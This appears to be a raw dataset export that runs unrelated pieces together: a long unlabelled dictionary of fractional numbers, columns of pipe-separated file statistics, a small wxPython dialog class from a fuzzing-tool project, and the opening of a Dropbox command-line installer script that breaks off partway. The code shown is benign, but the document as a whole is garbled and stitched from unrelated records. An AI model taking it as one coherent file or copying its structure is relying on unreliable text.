0.460693359375: [0.765625, 0.234375], 0.421875: [0.375, 0.625, 0.875, 0.125], 0.802490234375: [0.703125, 0.296875], 0.6083984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.870849609375: [0.859375, 0.140625], 0.339599609375: [0.859375, 0.140625], 0.982177734375: [0.953125, 0.046875], 0.560302734375: [0.453125, 0.546875], 0.09375: [0.25, 0.5, 0.75, 0.0], 0.226318359375: [0.265625, 0.734375], 0.1875: [0.25, 0.5, 0.75, 0.0], 0.021240234375: [0.296875, 0.703125], 0.628662109375: [0.890625, 0.109375], 0.58984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.704833984375: [0.828125, 0.171875], 0.96875: [0.5, 0.75, 0.0, 0.25], 0.165771484375: [0.921875, 0.078125], 0.120849609375: [0.859375, 0.140625], 0.271240234375: [0.296875, 0.703125], 0.169677734375: [0.953125, 0.046875], 0.286865234375: [0.796875, 0.203125], 0.046630859375: [0.984375, 0.015625], 0.476318359375: [0.734375, 0.265625], 0.4375: [0.5, 0.75, 0.0, 0.25], 0.833740234375: [0.703125, 0.296875], 0.6396484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.6875: [0.5, 0.75, 0.0, 0.25], 0.902099609375: [0.859375, 0.140625], 0.355224609375: [0.359375, 0.640625], 0.591552734375: [0.453125, 0.546875], 0.234130859375: [0.984375, 0.015625], 0.3505859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.659912109375: [0.890625, 0.109375], 0.62109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.517333984375: [0.828125, 0.171875], 0.1162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.013427734375: [0.953125, 0.046875], 0.173583984375: [0.828125, 0.171875], 0.767333984375: [0.828125, 0.171875], 0.124755859375: [0.484375, 0.515625], 0.245849609375: [0.859375, 0.140625], 0.9130859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.796630859375: [0.984375, 0.015625], 0.302490234375: [0.296875, 0.703125], 0.491943359375: [0.765625, 0.234375], 0.453125: [0.375, 0.625, 0.875, 0.125], 0.864990234375: [0.703125, 0.296875], 0.6708984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.554443359375: [0.765625, 0.234375], 0.933349609375: [0.859375, 0.140625], 0.370849609375: [0.859375, 0.140625], 0.622802734375: [0.453125, 0.546875], 0.064208984375: [0.328125, 0.671875], 0.005615234375: [0.796875, 0.203125], 0.241943359375: [0.765625, 0.234375], 0.203125: [0.375, 0.625, 0.875, 0.125], 0.3662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.691162109375: [0.890625, 0.109375], 0.65234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.962646484375: [0.421875, 0.578125], 0.439208984375: [0.328125, 0.671875], 0.181396484375: [0.421875, 0.578125], 0.015625: [0.375, 0.625, 0.875, 0.125], 0.796875: [0.375, 0.625, 0.875, 0.125], 0.21484375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.9443359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.827880859375: [0.984375, 0.015625], 0.08984375: [0.1875, 0.3125, 0.6875, 0.9375, 0.0625, 0.4375, 0.5625, 0.8125], 0.318115234375: [0.796875, 0.203125], 0.538818359375: [0.734375, 0.265625], 0.6552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.986083984375: [0.828125, 0.171875], 0.46875: [0.5, 0.75, 0.0, 0.25], 0.896240234375: [0.703125, 0.296875], 0.7021484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.585693359375: [0.765625, 0.234375], 0.546875: [0.375, 0.625, 0.875, 0.125], 0.964599609375: [0.859375, 0.140625], 0.386474609375: [0.359375, 0.640625], 0.654052734375: [0.453125, 0.546875], 0.068115234375: [0.796875, 0.203125], 0.618896484375: [0.421875, 0.578125], 0.4052734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.019287109375: [0.390625, 0.609375], 0.249755859375: [0.484375, 0.515625], 0.3818359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.722412109375: [0.890625, 0.109375], 0.68359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.265380859375: [0.984375, 0.015625], 0.519287109375: [0.390625, 0.609375], 0.454833984375: [0.828125, 0.171875], 0.189208984375: [0.328125, 0.671875], 0.9755859375: [0.65625, 0.84375, 0.15625, 0.34375], 0.859130859375: [0.984375, 0.015625], 0.333740234375: [0.296875, 0.703125], 0.128662109375: [0.890625, 0.109375], 0.689208984375: [0.671875, 0.328125], 0.484375: [0.375, 0.625, 0.875, 0.125], 0.927490234375: [0.703125, 0.296875], 0.056396484375: [0.421875, 0.578125], 0.7333984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.616943359375: [0.765625, 0.234375], 0.578125: [0.375, 0.625, 0.875, 0.125], 0.995849609375: [0.859375, 0.140625], 0.402099609375: [0.859375, 0.140625], 0.685302734375: [0.453125, 0.546875], 0.072021484375: [0.921875, 0.078125], 0.1083984375: [0.21875, 0.28125, 0.71875, 0.78125], 0.21875: [0.25, 0.5, 0.75, 0.0], 0.3974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.753662109375: [0.890625, 0.109375], 0.71484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.281005859375: [0.484375, 0.515625], 0.470458984375: [0.328125, 0.671875], 0.197021484375: [0.921875, 0.078125], 0.931396484375: [0.421875, 0.578125], 0.304443359375: [0.765625, 0.234375], 0.890380859375: [0.984375, 0.015625], 0.349365234375: [0.796875, 0.203125], 0.702880859375: [0.984375, 0.015625], 0.136474609375: [0.359375, 0.640625], 0.958740234375: [0.703125, 0.296875], 0.7646484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.648193359375: [0.765625, 0.234375], 0.609375: [0.375, 0.625, 0.875, 0.125], 0.829833984375: [0.828125, 0.171875], 0.417724609375: [0.359375, 0.640625], 0.716552734375: [0.453125, 0.546875], 0.075927734375: [0.953125, 0.046875], 0.1318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.265625: [0.375, 0.625, 0.875, 0.125], 0.2958984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.4130859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.784912109375: [0.890625, 0.109375], 0.74609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.2880859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.773193359375: [0.765625, 0.234375], 0.521240234375: [0.703125, 0.296875], 0.486083984375: [0.828125, 0.171875], 0.204833984375: [0.828125, 0.171875], 0.542724609375: [0.359375, 0.640625], 0.921630859375: [0.984375, 0.015625], 0.364990234375: [0.296875, 0.703125], 0.144287109375: [0.390625, 0.609375], 0.989990234375: [0.703125, 0.296875], 0.7958984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.679443359375: [0.765625, 0.234375], 0.640625: [0.375, 0.625, 0.875, 0.125], 0.433349609375: [0.859375, 0.140625], 0.747802734375: [0.453125, 0.546875], 0.079833984375: [0.828125, 0.171875], 0.1396484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.5537109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.234375: [0.375, 0.625, 0.875, 0.125], 0.027099609375: [0.859375, 0.140625], 0.296630859375: [0.984375, 0.015625], 0.77734375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.312255859375: [0.484375, 0.515625], 0.212646484375: [0.421875, 0.578125], 0.573974609375: [0.359375, 0.640625], 0.5146484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.380615234375: [0.796875, 0.203125], 0.152099609375: [0.859375, 0.140625], 0.472412109375: [0.890625, 0.109375], 0.710693359375: [0.765625, 0.234375], 0.671875: [0.375, 0.625, 0.875, 0.125], 0.259521484375: [0.921875, 0.078125], 0.6318359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.448974609375: [0.359375, 0.640625], 0.779052734375: [0.453125, 0.546875], 0.083740234375: [0.296875, 0.703125], 0.1474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.5849609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.673583984375: [0.828125, 0.171875], 0.4443359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.847412109375: [0.890625, 0.109375], 0.80859375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.327880859375: [0.984375, 0.015625], 0.853271484375: [0.921875, 0.078125], 0.536865234375: [0.796875, 0.203125], 0.523193359375: [0.765625, 0.234375], 0.976318359375: [0.734375, 0.265625], 0.220458984375: [0.328125, 0.671875], 0.130615234375: [0.796875, 0.203125], 0.556396484375: [0.421875, 0.578125], 0.515625: [0.375, 0.625, 0.875, 0.125], 0.109375: [0.375, 0.625, 0.875, 0.125], 0.396240234375: [0.296875, 0.703125], 0.159912109375: [0.890625, 0.109375], 0.743896484375: [0.421875, 0.578125], 0.8583984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.741943359375: [0.765625, 0.234375], 0.703125: [0.375, 0.625, 0.875, 0.125], 0.275146484375: [0.421875, 0.578125], 0.111083984375: [0.828125, 0.171875], 0.464599609375: [0.859375, 0.140625], 0.810302734375: [0.453125, 0.546875], 0.087646484375: [0.421875, 0.578125], 0.1552734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.6162109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.878662109375: [0.890625, 0.109375], 0.83984375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.343505859375: [0.484375, 0.515625], 0.4912109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.228271484375: [0.921875, 0.078125], 0.636474609375: [0.359375, 0.640625], 0.0146484375: [0.21875, 0.28125, 0.71875, 0.78125], 0.306396484375: [0.421875, 0.578125], 0.411865234375: [0.796875, 0.203125], 0.167724609375: [0.359375, 0.640625], 0.638427734375: [0.953125, 0.046875], 0.8896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.058349609375: [0.859375, 0.140625], 0.734375: [0.375, 0.625, 0.875, 0.125], 0.290771484375: [0.921875, 0.078125], 0.480224609375: [0.359375, 0.640625], 0.841552734375: [0.453125, 0.546875], 0.091552734375: [0.453125, 0.546875], 0.1630859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.6474609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4755859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.909912109375: [0.890625, 0.109375], 0.87109375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.359130859375: [0.984375, 0.015625], 0.599365234375: [0.796875, 0.203125], 0.525146484375: [0.421875, 0.578125], 0.978271484375: [0.921875, 0.078125], 0.0224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.667724609375: [0.359375, 0.640625], 0.060302734375: [0.453125, 0.546875], 0.177490234375: [0.296875, 0.703125], 0.427490234375: [0.296875, 0.703125], 0.175537109375: [0.390625, 0.609375], 0.9208984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.804443359375: [0.765625, 0.234375], 0.765625: [0.375, 0.625, 0.875, 0.125], 0.720458984375: [0.328125, 0.671875], 0.587646484375: [0.421875, 0.578125], 0.062255859375: [0.484375, 0.515625], 0.495849609375: [0.859375, 0.140625], 0.872802734375: [0.453125, 0.546875], 0.1708984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.6787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.562255859375: [0.484375, 0.515625], 0.031005859375: [0.484375, 0.515625], 0.941162109375: [0.890625, 0.109375], 0.90234375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.374755859375: [0.484375, 0.515625], 0.630615234375: [0.796875, 0.203125], 0.243896484375: [0.421875, 0.578125], 0.698974609375: [0.359375, 0.640625], 0.761474609375: [0.359375, 0.640625], 0.253662109375: [0.890625, 0.109375], 0.657958984375: [0.328125, 0.671875], 0.12109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.443115234375: [0.796875, 0.203125], 0.183349609375: [0.859375, 0.140625], 0.775146484375: [0.421875, 0.578125], 0.9521484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.835693359375: [0.765625, 0.234375], 0.298583984375: [0.828125, 0.171875], 0.322021484375: [0.921875, 0.078125], 0.788818359375: [0.734375, 0.265625], 0.601318359375: [0.734375, 0.265625], 0.75: [0.5, 0.75, 0.0, 0.25], 0.904052734375: [0.453125, 0.546875], 0.099365234375: [0.203125, 0.796875], 0.1787109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.593505859375: [0.484375, 0.515625], 0.972412109375: [0.890625, 0.109375], 0.93359375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.390380859375: [0.984375, 0.015625], 0.661865234375: [0.796875, 0.203125], 0.816162109375: [0.890625, 0.109375], 0.527099609375: [0.859375, 0.140625], 0.730224609375: [0.359375, 0.640625], 0.269287109375: [0.390625, 0.609375], 0.458740234375: [0.296875, 0.703125], 0.191162109375: [0.890625, 0.109375], 0.15234375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.2646484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9599609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.798583984375: [0.828125, 0.171875], 0.9833984375: [0.71875, 0.78125, 0.21875, 0.28125], 0.866943359375: [0.765625, 0.234375], 0.828125: [0.375, 0.625, 0.875, 0.125], 0.337646484375: [0.421875, 0.578125], 0.032958984375: [0.328125, 0.671875], 0.935302734375: [0.453125, 0.546875], 0.103271484375: [0.921875, 0.078125], 0.7412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.624755859375: [0.484375, 0.515625], 0.96484375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.406005859375: [0.484375, 0.515625], 0.693115234375: [0.796875, 0.203125], 0.884521484375: [0.921875, 0.078125], 0.868896484375: [0.421875, 0.578125], 0.034912109375: [0.890625, 0.109375], 0.284912109375: [0.890625, 0.109375], 0.859375: [0.375, 0.625, 0.875, 0.125], 0.308349609375: [0.859375, 0.140625], 0.474365234375: [0.796875, 0.203125], 0.198974609375: [0.359375, 0.640625], 0.2802734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.898193359375: [0.765625, 0.234375], 0.366943359375: [0.765625, 0.234375], 0.353271484375: [0.921875, 0.078125], 0.138427734375: [0.953125, 0.046875], 0.05859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.107177734375: [0.953125, 0.046875], 0.3349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.7724609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.656005859375: [0.484375, 0.515625], 0.939208984375: [0.671875, 0.328125], 0.99609375: [0.4375, 0.5625, 0.9375, 0.8125, 0.1875, 0.3125, 0.6875, 0.0625], 0.724365234375: [0.796875, 0.203125], 0.952880859375: [0.984375, 0.015625], 0.642333984375: [0.828125, 0.171875], 0.529052734375: [0.453125, 0.546875], 0.1943359375: [0.34375, 0.65625, 0.84375, 0.15625], 0.300537109375: [0.390625, 0.609375], 0.046875: [0.375, 0.625, 0.875, 0.125], 0.489990234375: [0.296875, 0.703125], 0.501708984375: [0.328125, 0.671875], 0.206787109375: [0.390625, 0.609375], 0.550537109375: [0.390625, 0.609375], 0.929443359375: [0.765625, 0.234375], 0.890625: [0.625, 0.875, 0.125, 0.375], 0.368896484375: [0.421875, 0.578125], 0.146240234375: [0.296875, 0.703125], 0.997802734375: [0.453125, 0.546875], 0.095458984375: [0.328125, 0.671875], 0.2021484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.8037109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.687255859375: [0.484375, 0.515625], 0.697021484375: [0.921875, 0.078125], 0.769287109375: [0.390625, 0.609375], 0.437255859375: [0.484375, 0.515625], 0.755615234375: [0.796875, 0.203125], 0.5615234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8271484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.823974609375: [0.359375, 0.640625], 0.316162109375: [0.890625, 0.109375], 0.27734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.712646484375: [0.421875, 0.578125], 0.1865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.5224609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.984130859375: [0.984375, 0.015625], 0.214599609375: [0.859375, 0.140625], 0.3115234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.581787109375: [0.390625, 0.609375], 0.960693359375: [0.765625, 0.234375], 0.921875: [0.625, 0.875, 0.125, 0.375], 0.384521484375: [0.921875, 0.078125], 0.038818359375: [0.265625, 0.734375], 0.751708984375: [0.671875, 0.328125], 0.114990234375: [0.296875, 0.703125], 0.2099609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.8349609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.718505859375: [0.484375, 0.515625], 0.765380859375: [0.984375, 0.015625], 0.8818359375: [0.65625, 0.84375, 0.15625, 0.34375], 0.452880859375: [0.984375, 0.015625], 0.786865234375: [0.796875, 0.203125], 0.5927734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.531005859375: [0.484375, 0.515625], 0.855224609375: [0.640625, 0.359375], 0.331787109375: [0.390625, 0.609375], 0.792724609375: [0.359375, 0.640625], 0.544677734375: [0.953125, 0.046875], 0.726318359375: [0.734375, 0.265625], 0.222412109375: [0.890625, 0.109375], 0.18359375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.3271484375: [0.28125, 0.71875, 0.78125, 0.21875], 0.613037109375: [0.390625, 0.609375], 0.991943359375: [0.765625, 0.234375], 0.953125: [0.375, 0.625, 0.875, 0.125], 0.040771484375: [0.921875, 0.078125], 0.118896484375: [0.421875, 0.578125], 0.2177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.8662109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.749755859375: [0.484375, 0.515625], 0.279052734375: [0.453125, 0.546875], 0.468505859375: [0.484375, 0.515625], 0.818115234375: [0.796875, 0.203125], 0.6240234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.923583984375: [0.828125, 0.171875], 0.886474609375: [0.640625, 0.359375], 0.347412109375: [0.890625, 0.109375], 0.30859375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.575927734375: [0.953125, 0.046875], 0.263427734375: [0.953125, 0.046875], 0.876708984375: [0.671875, 0.328125], 0.230224609375: [0.359375, 0.640625], 0.3427734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.644287109375: [0.390625, 0.609375], 0.564208984375: [0.328125, 0.671875], 0.984375: [0.625, 0.875, 0.125, 0.375], 0.415771484375: [0.921875, 0.078125], 0.042724609375: [0.359375, 0.640625], 0.888427734375: [0.953125, 0.046875], 0.993896484375: [0.421875, 0.578125], 0.122802734375: [0.453125, 0.546875], 0.2255859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.8974609375: [0.40625, 0.59375, 0.90625, 0.09375], 0.781005859375: [0.484375, 0.515625], 0.294677734375: [0.953125, 0.046875], 0.484130859375: [0.984375, 0.015625], 0.849365234375: [0.796875, 0.203125], 0.605224609375: [0.359375, 0.640625], 0.532958984375: [0.328125, 0.671875], 0.025146484375: [0.421875, 0.578125], 0.0302734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.917724609375: [0.640625, 0.359375], 0.036865234375: [0.796875, 0.203125], 0.607177734375: [0.953125, 0.046875], 0.140380859375: [0.984375, 0.015625], 0.003662109375: [0.890625, 0.109375], 0.238037109375: [0.390625, 0.609375], 0.3583984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.675537109375: [0.390625, 0.609375], 0.431396484375: [0.421875, 0.578125], 0.044677734375: [0.953125, 0.046875], 0.2333984375: [0.28125, 0.71875, 0.78125, 0.21875], 0.9287109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.812255859375: [0.484375, 0.515625], 0.310302734375: [0.453125, 0.546875], 0.970458984375: [0.671875, 0.328125], 0.499755859375: [0.484375, 0.515625], 0.880615234375: [0.796875, 0.203125], 0.6865234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.570068359375: [0.734375, 0.265625], 0.948974609375: [0.359375, 0.640625], 0.378662109375: [0.890625, 0.109375], 0.33984375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.0380859375: [0.34375, 0.65625, 0.84375, 0.15625], 0.066162109375: [0.890625, 0.109375], 0.171875: [0.375, 0.625, 0.875, 0.125], 0.011474609375: [0.359375, 0.640625], 0.3740234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.706787109375: [0.390625, 0.609375], 0.257568359375: [0.265625, 0.734375], 0.447021484375: [0.921875, 0.078125], 0.185302734375: [0.453125, 0.546875], 0.023193359375: [0.234375, 0.765625], 0.2412109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.4287109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.843505859375: [0.484375, 0.515625], 0.423583984375: [0.828125, 0.171875], 0.325927734375: [0.953125, 0.046875], 0.728271484375: [0.921875, 0.078125], 0.837646484375: [0.421875, 0.578125], 0.911865234375: [0.796875, 0.203125], 0.7177734375: [0.46875, 0.53125, 0.96875, 0.03125], 0.503662109375: [0.890625, 0.109375], 0.5625: [0.5, 0.75, 0.0, 0.25], 0.947021484375: [0.921875, 0.078125], 0.980224609375: [0.640625, 0.359375], 0.394287109375: [0.390625, 0.609375], 0.669677734375: [0.953125, 0.046875], 0.070068359375: [0.265625, 0.734375], 0.52734375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.03125: [0.25, 0.5, 0.75, 0.0], 0.3896484375: [0.71875, 0.78125, 0.21875, 0.28125], 0.738037109375: [0.390625, 0.609375], 0.273193359375: [0.765625, 0.234375], 0.907958984375: [0.671875, 0.328125], 0.462646484375: [0.421875, 0.578125], 0.193115234375: [0.796875, 0.203125], 0.782958984375: [0.671875, 0.328125], 0.2490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.9912109375: [0.40625, 0.59375, 0.90625, 0.09375], 0.874755859375: [0.484375, 0.515625], 0.341552734375: [0.453125, 0.546875], 0.132568359375: [0.265625, 0.734375], 0.851318359375: [0.734375, 0.265625], 0.943115234375: [0.796875, 0.203125], 0.7490234375: [0.46875, 0.53125, 0.96875, 0.03125], 0.632568359375: [0.734375, 0.265625], 0.59375: [0.5, 0.75, 0.0, 0.25], 0.409912109375: [0.890625, 0.109375], 0.37109375: [0.3125, 0.4375, 0.8125, 0.6875, 0.0625, 0.1875, 0.5625, 0.9375], 0.700927734375: [0.953125, 0.046875], 0.073974609375: [0.359375, 0.640625], 0.421630859375: [0.984375, 0.015625], 0.142333984375: [0.828125, 0.171875], 0.050537109375: [0.390625, 0.609375], 0.288818359375: [0.265625, 0.734375], 0.25: [0.5, 0.75, 0.0, 0.25], 0.611083984375: [0.828125, 0.171875], 0.478271484375: [0.921875, 0.078125], 0.200927734375: [0.953125, 0.046875], 0.540771484375: [0.921875, 0.078125], 0.8125: [0.5, 0.75, 0.0, 0.25], 0.906005859375: [0.484375, 0.515625], 0.357177734375: [0.953125, 0.046875], 0.400146484375: [0.421875, 0.578125]}
| 18,661.4
| 30,928
| 0.721296
| 15,378
| 93,307
| 4.376187
| 0.048186
| 0.004101
| 0.003076
| 0.004755
| 0.99471
| 0.992407
| 0.992407
| 0.990787
| 0.990787
| 0.990787
| 0
| 0.785317
| 0.082341
| 93,307
| 5
| 30,929
| 18,661.4
| 0.000642
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
90c4f2755b1867d25aa9ddb2770459b7bd8bac59
| 608
|
py
|
Python
|
FuzzingTool_Dialog_FuzzAlreadyMinimized_Child.py
|
Ryu-Miyaki/Fuzz4B
|
8546f165d4dbdd97eb6ab5a6f4c445ee81ec364b
|
[
"MIT"
] | 16
|
2020-06-25T11:56:59.000Z
|
2022-02-05T14:00:12.000Z
|
FuzzingTool_Dialog_FuzzAlreadyMinimized_Child.py
|
Ryu-Miyaki/Fuzz4B
|
8546f165d4dbdd97eb6ab5a6f4c445ee81ec364b
|
[
"MIT"
] | null | null | null |
FuzzingTool_Dialog_FuzzAlreadyMinimized_Child.py
|
Ryu-Miyaki/Fuzz4B
|
8546f165d4dbdd97eb6ab5a6f4c445ee81ec364b
|
[
"MIT"
] | null | null | null |
"""Subclass of Dialog_FuzzAlreadyMinimized, which is generated by wxFormBuilder."""
import wx
import FuzzingTool
from FuzzingTool_Dialog_FuzzAlreadyMinimized import FuzzingTool_Dialog_FuzzAlreadyMinimized
# Implementing Dialog_FuzzAlreadyMinimized
class FuzzingTool_Dialog_FuzzAlreadyMinimized_Child( FuzzingTool_Dialog_FuzzAlreadyMinimized ):
def __init__( self, parent ):
FuzzingTool.Dialog_FuzzAlreadyMinimized.__init__( self, parent )
# Handlers for Dialog_FuzzAlreadyMinimized events.
def Button_OKOnButtonClick( self, event ):
# TODO: Implement Button_OKOnButtonClick
self.EndModal(True)
| 33.777778
| 95
| 0.847039
| 59
| 608
| 8.338983
| 0.508475
| 0.422764
| 0.376016
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100329
| 608
| 17
| 96
| 35.764706
| 0.899452
| 0.340461
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 1
| 0.25
| false
| 0
| 0.375
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
90ca01bf177f568017614f2abec701ea01e14534
| 119,684
|
py
|
Python
|
dropbox.py
|
rgdcastro/docker-dropbox
|
69588b22282e4917ea29b8b1033bdcd7d686eab0
|
[
"MIT"
] | 5
|
2017-04-26T20:34:06.000Z
|
2022-01-20T14:42:34.000Z
|
rbin/dropbox.py
|
ryanmjacobs/rd
|
59b950a20a04eb406b78a14be9461fece1bc6882
|
[
"MIT"
] | null | null | null |
rbin/dropbox.py
|
ryanmjacobs/rd
|
59b950a20a04eb406b78a14be9461fece1bc6882
|
[
"MIT"
] | 1
|
2021-04-20T13:37:10.000Z
|
2021-04-20T13:37:10.000Z
|
#!/usr/bin/env python3
#
# Copyright (c) Dropbox, Inc.
#
# dropbox
# Dropbox frontend script
# This file is part of nautilus-dropbox 2020.03.04.
#
# nautilus-dropbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nautilus-dropbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nautilus-dropbox. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import with_statement
import errno
import locale
import optparse
import os
import platform
import shutil
import socket
import subprocess
import sys
import tarfile
import tempfile
import threading
import _thread
import time
import traceback
import urllib.request
try:
import gpg
gpgme = None
except ImportError:
gpg = None
# Still support gpgme for now. Remove this once we only support 17.04+.
try:
import gpgme
except ImportError:
gpgme = None
from contextlib import closing, contextmanager
from io import BytesIO
from operator import methodcaller
from os.path import relpath
from posixpath import curdir, sep, pardir, join, abspath, commonprefix
INFO = "Dropbox is the easiest way to share and store your files online. Want to learn more? Head to"
LINK = "https://www.dropbox.com/"
WARNING = "In order to use Dropbox, you must download the proprietary daemon."
GPG_WARNING = "Note: python3-gpg (python3-gpgme for Ubuntu 16.10 and lower) is not installed, we will not be able to verify binary signatures."
ERROR_CONNECTING = "Trouble connecting to Dropbox servers. Maybe your internet connection is down, or you need to set your http_proxy environment variable."
ERROR_SIGNATURE = "Downloaded binary does not match Dropbox signature, aborting install."
ERROR_INVALID_DROPBOX = "Could not start the Dropbox daemon. Make sure your computer meets the minimum requirements:\nhttps://www.dropbox.com/help/desktop-web/system-requirements#desktop"
DOWNLOAD_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s"
SIGNATURE_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s&signature=1"
DOWNLOADING = "Downloading Dropbox... %d%%"
UNPACKING = "Unpacking Dropbox... %d%%"
PARENT_DIR = os.path.expanduser("~")
